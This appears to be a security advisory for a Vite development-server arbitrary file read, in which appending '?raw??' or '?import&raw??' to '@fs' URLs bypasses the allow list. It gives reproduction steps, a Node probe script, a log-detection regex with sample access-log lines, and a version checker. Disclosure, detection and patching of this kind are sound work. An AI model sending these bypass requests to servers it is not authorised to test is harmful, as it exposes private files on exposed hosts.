Vite Arbitrary File Read Vulnerability via URL Query Parameters

Vulnerability

A vulnerability in Vite allows the contents of arbitrary files to be read and returned to the browser. It affects versions prior to 6.2.3, 6.1.2, 6.0.12, 5.4.15, and 4.5.10. The development server's '@fs' route normally refuses to serve files outside the configured allow list (server.fs.allow). Appending '?raw??' or '?import&raw??' to such a URL bypasses that check: the extra '?' separators are handled inconsistently, so the allow-list check no longer recognizes the request as a raw file read while the file is still served as a raw string module. Only applications that explicitly expose the development server to the network (for example with the --host flag or the server.host option) are vulnerable; by default it listens on localhost only.

Impact

Anyone who can reach an exposed development server can read files outside the allow list on the host running it, including files unrelated to the project; the contents are returned in the HTTP response to the requester's browser or client.

Reproduction

To reproduce, create a new Vite project and start the development server. Place a file containing sensitive data outside the project, for example '/tmp/secret.txt', and request it through the '@fs' route, which takes the absolute path (e.g. /@fs/tmp/secret.txt). The request is refused with a '403 Restricted' response. Append '?import&raw??' to the same URL and the file's contents are returned, demonstrating the bypass.
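As an added example (not code from Vite or from this advisory), the Node script below serves both the Vulnerability and Reproduction sections: it builds the '@fs' request and the two bypass variants named above, probes a running dev server for the 403-versus-200 difference the reproduction steps describe, and flags the bypass pattern in reverse-proxy access-log lines. The base URL http://localhost:5173, the file /tmp/secret.txt, the VITE_PROBE_BASE environment variable and the log lines are all constructed assumptions, not details from the page.

```javascript
// Added example, not code from Vite or the advisory. Assumptions: dev server
// at http://localhost:5173 (Vite's default port), probed file /tmp/secret.txt,
// VITE_PROBE_BASE as a hypothetical env var, and constructed access-log lines.

// The '@fs' route takes the absolute path after '/@fs/', so '/tmp/secret.txt'
// becomes '/@fs/tmp/secret.txt'. The two bypass variants append the query
// strings named in the advisory.
function buildProbeUrls(baseUrl, absPath) {
  const base = baseUrl.replace(/\/+$/, '');
  const fsPath = '/@fs/' + absPath.replace(/^\/+/, '');
  return {
    direct: `${base}${fsPath}`,
    raw: `${base}${fsPath}?raw??`,
    importRaw: `${base}${fsPath}?import&raw??`,
  };
}

// Probe a dev server: the plain '@fs' request should be refused with 403,
// and the server is vulnerable if either bypass variant instead returns 200
// with a body. fetchImpl is injectable so the logic can run without a live
// server; by default Node's global fetch (Node 18+) is used.
async function probe(baseUrl, absPath, fetchImpl = globalThis.fetch) {
  const results = {};
  for (const [name, url] of Object.entries(buildProbeUrls(baseUrl, absPath))) {
    const res = await fetchImpl(url);
    results[name] = { url, status: res.status, body: await res.text() };
  }
  results.vulnerable =
    results.direct.status === 403 &&
    [results.raw, results.importRaw].some(r => r.status === 200 && r.body.length > 0);
  return results;
}

// Detection: an '/@fs/' request whose query string contains 'raw' and a second
// '?' separator. Legitimate '?raw' imports carry exactly one '?', so they are
// not flagged. Works on a bare request target or a whole access-log line.
const BYPASS_RE = /\/@fs\/[^\s"]*\?[^\s"]*raw[^\s"]*\?/i;

function isBypassRequest(line) {
  return BYPASS_RE.test(line);
}

function findBypassAttempts(lines) {
  return lines.filter(isBypassRequest);
}

// Constructed access-log lines (nginx combined format) from a reverse proxy in
// front of the dev server; only the two lines carrying the bypass are flagged.
const SAMPLE_LOG = [
  '10.0.0.5 - - [09/Jun/2025:19:46:01 +0000] "GET /src/main.ts HTTP/1.1" 200 512',
  '10.0.0.5 - - [09/Jun/2025:19:46:02 +0000] "GET /@fs/tmp/secret.txt HTTP/1.1" 403 10',
  '10.0.0.5 - - [09/Jun/2025:19:46:03 +0000] "GET /@fs/tmp/secret.txt?import&raw?? HTTP/1.1" 200 96',
  '10.0.0.9 - - [09/Jun/2025:19:46:04 +0000] "GET /@fs/tmp/secret.txt?raw?? HTTP/1.1" 200 96',
  '10.0.0.7 - - [09/Jun/2025:19:46:05 +0000] "GET /src/logo.svg?raw HTTP/1.1" 200 1201',
];

// Stand-alone run: list flagged log lines, and probe a live server only when
// VITE_PROBE_BASE points at one (e.g. VITE_PROBE_BASE=http://localhost:5173).
console.log('flagged:', findBypassAttempts(SAMPLE_LOG));
if (process.env.VITE_PROBE_BASE) {
  probe(process.env.VITE_PROBE_BASE, '/tmp/secret.txt')
    .then(r => console.log(r.vulnerable ? 'VULNERABLE' : 'not reproduced', r))
    .catch(e => console.error('probe failed:', e.message));
}
```

Run it against a patched server and the bypass variants return 403 like the direct request, so `vulnerable` stays false; the log detector is only meaningful if a proxy or the dev server itself records request targets, since Vite does not log them by default.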

Remediation

Update to Vite 6.2.3, 6.1.2, 6.0.12, 5.4.15, or 4.5.10, whichever matches the release line in use. Until the update is applied, do not expose the development server to the network: leave server.host at its localhost default and do not start it with --host.
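An added check (not code from Vite or this advisory) that maps an installed Vite version onto the fixed releases listed above and reports whether it is affected and which release to move to. Reading the five fixed versions as one cut-off per release line (6.2.x before 6.2.3, 6.1.x before 6.1.2, 6.0.x before 6.0.12, 5.x before 5.4.15, 4.x before 4.5.10), treating 6.3 and later as fixed, treating majors below 4 as affected, and the node_modules/vite/package.json lookup are assumptions made here.

```javascript
// Added example, not code from Vite or the advisory. Assumptions: the fixed
// releases above are one cut-off per release line (6.2.x < 6.2.3, 6.1.x < 6.1.2,
// 6.0.x < 6.0.12, 5.x < 5.4.15, 4.x < 4.5.10); 6.3 and later majors are treated
// as fixed; majors below 4 are treated as affected since no fix is listed for
// them; and the installed version is read from node_modules/vite/package.json.

// Parse 'v?MAJOR.MINOR.PATCH[-prerelease]'; a prerelease sorts before its release.
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(-[0-9A-Za-z.-]+)?/.exec(String(v).trim());
  if (!m) throw new Error(`unparseable version: ${v}`);
  return { nums: [m[1], m[2], m[3]].map(Number), pre: Boolean(m[4]) };
}

function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (pa.nums[i] !== pb.nums[i]) return pa.nums[i] - pb.nums[i];
  }
  return (pa.pre ? 0 : 1) - (pb.pre ? 0 : 1);
}

// The fixed release on the same line: the smallest upgrade that closes the hole.
// 6.3+ and later majors map to 6.2.3 and compare as newer, i.e. not affected.
function fixedVersionFor(version) {
  const [major, minor] = parseVersion(version).nums;
  if (major >= 7 || (major === 6 && minor >= 2)) return '6.2.3';
  if (major === 6 && minor === 1) return '6.1.2';
  if (major === 6) return '6.0.12';
  if (major === 5) return '5.4.15';
  return '4.5.10';
}

function isAffectedVersion(version) {
  return compareVersions(version, fixedVersionFor(version)) < 0;
}

// Read the installed version from a project directory and report on it.
async function checkInstalled(projectDir = process.cwd()) {
  const { readFileSync } = await import('node:fs');
  const { join } = await import('node:path');
  const pkgPath = join(projectDir, 'node_modules', 'vite', 'package.json');
  const { version } = JSON.parse(readFileSync(pkgPath, 'utf8'));
  const affected = isAffectedVersion(version);
  return { version, affected, upgradeTo: affected ? fixedVersionFor(version) : null };
}

// Stand-alone run: show the boundary on each release line, then check the
// project in the current directory (if Vite is installed there).
for (const v of ['4.5.9', '4.5.10', '5.4.14', '5.4.15', '6.0.11', '6.0.12',
                 '6.1.1', '6.1.2', '6.2.2', '6.2.3', '6.3.0']) {
  console.log(v.padEnd(7), isAffectedVersion(v) ? `affected, upgrade to ${fixedVersionFor(v)}` : 'fixed');
}
checkInstalled().then(console.log, e => console.error('no installed Vite found:', e.message));
```

Run it from the project root (`node check-vite.js`, with the file saved under any name) to get the installed version alongside the verdict; for a monorepo, pass each package directory to checkInstalled, since nested node_modules can pin different Vite versions.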

Added: Jun 9, 2025, 7:46 PM
Updated: Jun 9, 2025, 7:46 PM